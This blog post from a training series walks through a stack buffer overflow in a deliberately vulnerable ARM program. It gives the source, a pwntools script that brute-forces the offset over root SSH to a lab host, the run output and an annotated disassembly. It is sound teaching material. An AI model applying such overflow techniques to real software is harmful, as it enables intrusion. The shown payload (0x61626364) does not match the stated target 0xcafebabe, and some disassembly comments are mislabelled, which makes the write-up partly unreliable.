DEV Community

loading...
Cover image for ARM BOF, überwrite stack data

ARM BOF, überwrite stack data

hextrace
Writing about software security
・3 min read

In this second protoarm exercise, we'll exploit a buffer overflow to write arbitary data onto the stack. The goal is to rewrite the vulnerable integer to 0xcafebabe. Here is the vulnerable program:

#include <stdio.h>
#include <string.h>
#include <err.h>

int main(int argc, char**argv)
{
    volatile int vulnerable;
    char buffer[64];

    if (argc == 1)
        errx(1, "argument missing\n");

    vulnerable = 0;
    strcpy(buffer, argv[1]);

    if (vulnerable == 0xcafebabe)
        printf("congratulations\n");
    else
        printf("nope");
}
Enter fullscreen mode Exit fullscreen mode

We can write the following exploit, based on the previous one:

#!/usr/bin/env python3

import struct
from pwn import *


socket = ssh(host='192.168.0.1', user='root', password='')

i = 60
while True:
    i += 1
    print('test', i)
    payload = b'A' * i + struct.pack('<I', 0x61626364)
    process = socket.process(
        argv=['/root/protostarm/stack1/stack1', payload ],
    )
    res = process.recv().decode()
    print('res =', res)
    process.close()
    if 'congratulations' in res:
        break

socket.close()
Enter fullscreen mode Exit fullscreen mode

And there we go, the congratulations output:

user@Azeria-Lab-VM:~/protoarm/stack1$ ./exploit.py 
[+] Connecting to 192.168.0.1 on port 22: Done
[*] root@192.168.0.1:
    Distro    Debian testing
    OS:       linux
    Arch:     arm
    Version:  4.9.0
    ASLR:     Enabled
test 61
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1585
res = nope

[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1585)
test 62
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1589
res = nope

[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1589)
test 63
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1593
res = nope

[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1593)
test 64
[+] Starting remote process '/root/protostarm/stack1/stack1' on 192.168.0.1: pid 1597
res = congratulations

[*] Stopped remote process 'stack1' on 192.168.0.1 (pid 1597)
[*] Closed connection to '192.168.0.1'
Enter fullscreen mode Exit fullscreen mode

Again, we bruteforced the correct offset but it can be found by reading at the disassembly:

00000564 <main>:
epilog:
 564:   b580            push    {r7, lr}
 566:   b094            sub     sp, #80 ; 0x50      ; reserve 0x50 bytes for the stack
 568:   af00            add     r7, sp, #0      ; r7 = sp
 56a:   6078            str     r0, [r7, #4]        ; r0 = argv[0]
 56c:   6039            str     r1, [r7, #0]        ; r1 = argc
 56e:   687b            ldr     r3, [r7, #4]
 570:   2b01            cmp     r3, #1
 572:   d105            bne.n   580 <main+0x1c>

error:
 574:   4b13            ldr     r3, [pc, #76]       ; (5c4 <main+0x60>)
 576:   447b            add     r3, pc
 578:   4619            mov     r1, r3
 57a:   2001            movs    r0, #1          ; EXIT_FAILURE
 57c:   f7ff ef5e       blx     43c <errx@plt>

read_and_compare_input:
 580:   2300            movs    r3, #0
 582:   64fb            str     r3, [r7, #76]
 584:   683b            ldr     r3, [r7, #0]
 586:   3304            adds    r3, #4
 588:   681a            ldr     r2, [r3, #0]        ; r2 = argv[1]
 58a:   f107 030c       add.w   r3, r7, #12     ; r3 = buffer of 76-12=64 bytes
 58e:   4611            mov     r1, r2
 590:   4618            mov     r0, r3
 592:   f7ff ef3c       blx     40c <strcpy@plt>    ; strcpy(buffer, argv[1]);
 596:   6cfa            ldr     r2, [r7, #76]       ; r2 = vulnerable
 598:   f246 3364       movw    r3, #47806          ; set lower bits of r3 to 0xbabe
 59c:   f2c6 1362       movt    r3, #51966          ; se higher bits fo r3 to 0xcafe
 5a0:   429a            cmp     r2, r3          ; vulnerable == 0xcafebabe?
 5a2:   d105            bne.n   5b0 <main+0x4c>

good_boy:
 5a4:   4b08            ldr     r3, [pc, #32]       ; (5c8 <main+0x64>)
 5a6:   447b            add     r3, pc
 5a8:   4618            mov     r0, r3
 5aa:   f7ff ef36       blx     418 <puts@plt>      ; puts("congratulations\n");

jump_to_epilog:
 5ae:   e004            b.n     5ba <main+0x56>

bad_boy:
 5b0:   4b06            ldr     r3, [pc, #24]       ; (5cc <main+0x68>)
 5b2:   447b            add     r3, pc
 5b4:   4618            mov     r0, r3
 5b6:   f7ff ef30       blx     418 <puts@plt>      ; puts ("nope\n");

epilog:
 5ba:   2300            movs    r3, #0
 5bc:   4618            mov     r0, r3          ; return 0;
 5be:   3750            adds    r7, #80 ; 0x50
 5c0:   46bd            mov     sp, r7
 5c2:   bd80            pop     {r7, pc}


literal pool:
 5c4:   000000a6
 5c8:   0000008a
 5cc:   0000008e
Enter fullscreen mode Exit fullscreen mode

Discussion (0)